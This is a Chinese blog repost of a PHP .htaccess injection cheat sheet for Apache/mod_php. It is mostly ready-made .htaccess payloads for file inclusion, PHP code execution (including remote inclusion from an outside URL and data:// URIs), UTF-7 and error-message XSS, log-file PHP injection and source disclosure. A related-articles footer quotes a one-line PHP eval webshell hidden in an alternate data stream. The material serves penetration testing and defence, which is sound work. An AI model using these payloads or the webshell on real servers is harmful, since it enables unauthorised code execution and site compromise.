PHP htaccess注入备忘单

最新推荐文章于 2022-11-28 19:11:26 发布
最新推荐文章于 2022-11-28 19:11:26 发布
阅读量576 收藏 3
点赞数
原文链接:https://github.com/sektioneins/pcc/wiki/PHP-htaccess-injection-cheat-sheet
版权

情境

在Apache / mod_php的安装程序中,攻击者能够注入.htaccess(或php.ini或apache配置)。注入目录中设置了AllowOverride Options(或AllowOverride All,这也是很常见的)。

例子

示例1a:文件包含

index.php :(空)

.htaccess:

php_value auto_append_file /etc/hosts

例1b:PHP代码执行

index.php :(空)

.htaccess:

php_value auto_append_file .htaccess
#<?php phpinfo();

示例1c :(直接/远程)包含文件

index.php :(空)

.htaccess:

php_flag allow_url_include 1
php_value auto_append_file data://text/plain;base64,PD9waHAgcGhwaW5mbygpOw==
#php_value auto_append_file data://text/plain,%3C%3Fphp+phpinfo%28%29%3B
#php_value auto_append_file https://sektioneins.de/evil-code.txt

示例1d:使用UTF-7执行XSS和PHP代码

index.php :(空)

.htaccess:

php_flag zend.multibyte 1
php_value zend.script_encoding "UTF-7"
php_value auto_append_file .htaccess
#+ADw-script+AD4-alert(1)+ADsAPA-/script+AD4 #+ADw?php phpinfo()+ADs

示例2a:通过错误消息链接进行XSS

index.php :(产生错误消息)

<?php
include('foo');

.htaccess:

php_flag display_errors 1
php_flag html_errors 1
php_value docref_root "'><script>alert(1);</script>"

示例2b:通过错误消息链接扩展的XSS

index.php:

<?php
include('foo');

.htaccess:

php_flag display_errors 1
php_flag html_errors 1
php_value docref_root "x"
php_value docref_ext "<script>alert(1);</script>"

示例3a:通过phps颜色进行XSS

假设:phps源处理程序已激活。

<FilesMatch ".+\.phps$">
	SetHandler application/x-httpd-php-source
	Order Allow,Deny
	Allow from all
</FilesMatch>

index.phps:

<?php
test();
// comment
?>
text

.htaccess:

php_value highlight.comment '"><script>alert(1);</script>'

示例3b:通过highlight_file()颜色进行XSS

index.php:

<?php
highlight_file(__FILE__);
// comment

.htaccess:

php_value highlight.comment '"><script>alert(1);</script>'

示例4a:通过error_log和include_path注入的PHP失败

在此示例中,PHP在日志消息中正确编码了HTML实体。注入失败。

index.php:

<?php include('foo');

.htaccess:

php_value error_log /var/www/ex4a/foo.php
php_value include_path "<?php phpinfo(); __halt_compiler();"

示例4b:通过error_log和auto_prepend_file注入的PHP失败

index.php :(空)

.htaccess:

php_value error_log /var/www/ipc/ex4b/foo.php
php_value auto_prepend_file "<?php phpinfo(); __halt_compiler();"

示例4c:通过error_log和UTF-7注入PHP代码

index.php :(空)

.htaccess:

php_value error_log /var/www/ipc/ex4c/foo.php
#---- "<?php phpinfo(); __halt_compiler();" in UTF-7:
php_value include_path "+ADw?php phpinfo()+ADs +AF8AXw-halt+AF8-compiler()+ADs"

php_flag zend.multibyte 1
php_value zend.script_encoding "UTF-7"

示例6:源代码公开

index.php:

<?php some_code();

.htaccess:

php_flag engine 0
bylfsj
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php append,php.ini配置php auto_prepend_file和auto_append_file参数
weixin_32518317的博客
03-12 838
php.ini 中有两个配置参数,auto_prepend_file 和 auto_append_file,其作用相当于php代码 require 或 include,使用这两个指令包含的文件如果该文件不存在,将产生一个警告。auto_prepend_file 表示在php程序加载应用程序前加载指定的php文件auto_append_file 表示在php代码执行完毕后加载指定的php文件在某...
php静态化页面 htaccess写法详解(htaccess怎么写?)
01-10
如何让自己的本地APACHE服务器支持.htaccess 如何让自己的本地APACHE服务器支持”.htaccess”呢?其实只要简修改一下apache的httpd.conf设置就可以让APACHE支持.htaccess了,来看看操作 打开httpd.conf文件(在那里?...
Access数据库注入
weixin_44110913的博客
05-28 195
目录 Access数据库 Access数据库中的函数  盲注Access数据库  Sqlmap注入Access数据库 Access数据库 Microsoft Office Access是由微软发布的关系数据库管理系统。Microsoft Office Access是微软把数据库引擎的图形用户界面和软件开发工具结合在一起的一个数据库管理系统。它是微软Office家族的一个成员。Access以它自己的格...
一天一道ctf 第19天(handler sql注入,.htaccess文件上传)
scrawman的博客
04-05 204
[GYCTF2020]Blacklist 一个小知识点,题目和之前强网杯的随便注差不多,只是过滤的东西多了很多,那就不能更改表名了。这里用的是handler语句 1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;# [MRCTF2020]你传你????呢 这题和之前做过的一道文件上传题很像,都是先上传一个配置文件为之后上传的一句话木马开启一个后门(除了作者是个祖安以外)之前一道题传的是.user.in
htaccess文件解析漏洞和利用Tamper绕过防注入代码
maskgrinning的专栏
05-19 3763
(一)htaccess文件解析漏洞   Apache中当上传到文件全部被解析为,jpg的后缀时。可以尝试一下后缀为htaccess的文件,代码如下   AppType    application/x-httpd-php     .jpg 代码的含义 是 将上传的文件后缀名为.jpg格式的文件以 php格式来解析文件 一般黑名验证的上传成功几率比较大,白名什么的并无卵用,先上传这样
php.ini 配置auto_prepend_file和auto_append_file
a8927747的专栏
05-30 2780
一般都使用require()将页眉和脚注加入到每个页面中,但是除了传统的直接require以外,还有一种办法,就是使用配置文件php.ini中的两个选项auto_prepend_file和auto_append_file。 通过这两个选项来设置页眉和脚注,可以保证它们在每个页面的前后被载入。 使用这些指令包含的文件可以像使用include()语句包含的文件一样;也就是,如果该文件不存在,将产生
php检测iis环境是否支持htaccess的方法
12-19
PHP开发中,有时我们需要在IIS(Internet Information Services)环境下使用`.htaccess`文件来实现URL重写、隐藏文件扩展名或者禁止目录列表显示等高级功能。然而,与Apache服务器不同,IIS默认并不支持`.htaccess...
基于PHPhtaccess Editor htaccess在线生成器收藏版.zip
最新发布
07-20
使用PHP和在线生成器处理.htaccess时,必须注意避免SQL注入、XSS攻击等安全问题。同时,确保所有规则都经过充分测试,以免误操作导致网站功能异常。 6. **最佳实践** - 定期备份:在修改.htaccess前,做好现有...
PHP一句话木马免杀(3)
小刚的博客
10-14 1103
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 PHP木马免杀小技巧免杀小技巧1.ADS隐藏。2.修改.htaccess文件3.修改php.ini4.一句话拆分小结 免杀小技巧 1.ADS隐藏。 windows数据流有个很好的方式隐藏数据。 通过命令行 echo ^<?php @eval($_POST['pwd']);?^> > shell.php:123.jpg 会在本地生成一个shell.php文件,但打开却发现没有内容.
auto_prepend_file和auto_append_file的实用方法
孤独的梦1012
11-01 1353
auto_prepend_file和auto_append_file的实用方法如果希望使用require()将页眉和脚注加入到每个页面中,除了使用require函数引入外,还可以使用配置文件设置。在配置文件php.ini中有两个选项auto_prepend_file和auto_append_file。通过这两个选项来设置页眉和脚注,可以保证它们在每个页面的前后被载入。使用这些指令包含的文件可以像使用
PHP中auto_prepend_file与auto_append_file用法实例分析
weixin_30321709的博客
06-30 109
PHP中auto_prepend_file与auto_append_file用法实例分析 如果需要将文件require到所有页面的顶部与底部。 第一种方法:在所有页面的顶部与底部都加入require语句。 例如: ? require('header.php'); //页面正文内容部分 require('footer....
PHP文件上传漏洞
BrosyveryOK的博客
11-28 2358
上礼拜一直在搞期中测试和unctf,没啥时间整理,这礼拜继续整理!
干货|2020渗透测试面试问题大全 建议收藏
RuoLi_s的博客
01-28 2万+
转自HACK之道 乌雲安全 渗透篇 0.渗透测试知识体系结构 1、介绍一下自认为有趣的挖洞经历 挖洞也有分很多种类型,一种是以渗透、一种是以找漏洞为主,如果是前者会想各种办法获取权限继而获取想要的的东西完成渗透目标,这类跟HW类似,目标各种漏洞不算,要有Shell,服务器权限才给分,这才是最接近实战渗透,跟某部门有合作的话也是属于这种打击网络犯罪获得权限、传销数据、组织架构,服务器权限、等… 2、你平时用的比较多的漏洞是哪些?相关漏洞的原理?以及对应漏洞的修复方案? SQL注入、密码组合,前者防护分为
.htaccess详解及.htaccess参数说明
热门推荐
weilee2009的专栏
10-21 5万+
.htaccess文件(或者”分布式配置文件”)提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。 概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可
php网站后门漏洞检测 渗透测试木马解决
网站安全专家
10-23 2029
很多想做渗透测试的朋友都想了解关于PHP后门漏洞的安全测试重点方法,以及该如何预防被中php后门,本节由我们的Sine安全高级渗透工程师进行全面的讲解,来让大家更好的理解和了解php代码的安全检测,让网站得到最大化的安全保障,安全保障了,网站才能更长远的运行下去。 4.1.1. 后门 4.1.1.1. php.ini构成的后门 利用 auto_prepend_file 和 include...
Python中常见文件操作,纯干货
a1309525802的博客
09-04 6617
Python文件操作一、关于文件二、读写文件简操作三、文件权限四、文件高级操作五、大文件的读取基本方法常用函数 一、关于文件 文件的作用:把一些数据储存起来 使用文件流程: 打开文件,读写文件,关闭文件 二、读写文件简操作 1.读取文件 #打开文件 file = open("demo1/1.txt",mode="r") #读取文件 ret = file.read() #file只是变量,read是读取函数 print(ret) #关闭文件 file.close() #第一个参数的文件的路
.htaccess文件的正确写入方式
一点一滴 一天一天
04-07 1001
只有关于PHP一点点的写入vi .htaccess <IfModule mod_rewrite.c> RewriteEngine on RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{REQUEST_FILENAME} !-f RewriteRule ^(.*)$ index.php/$1 [QSA,PT,L
CTF中文件上传及文件包含总结
None安全团队
12-15 4556
【文件上传】 一、前端检查 前端对文件后缀进行检查,该种通过抓包修改数据包即可解决 二、文件名检查 (1)大小写绕过 在windows下,可以将后缀写为pHp (2)unicode 当目标存在json_decode且检查在json_decode之前,可以将php写为\u0070hp (3)php3457 该项为apache专属 关键点在/etc/apache2/mods-available/php5.6.conf这个文件,满足.+\.ph(p[3457]?|t|tml)$,都会被当.
PHP伪静态与.htaccess使用全面指南
"php伪静态htaccess使用手册" 在Web开发中,`.htaccess`文件是一个非常重要的配置文件,尤其在PHP环境中,它被用来实现多种功能,如URL重写、目录权限控制、错误页面定制等。这篇教程主要针对PHP伪静态设置和`....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值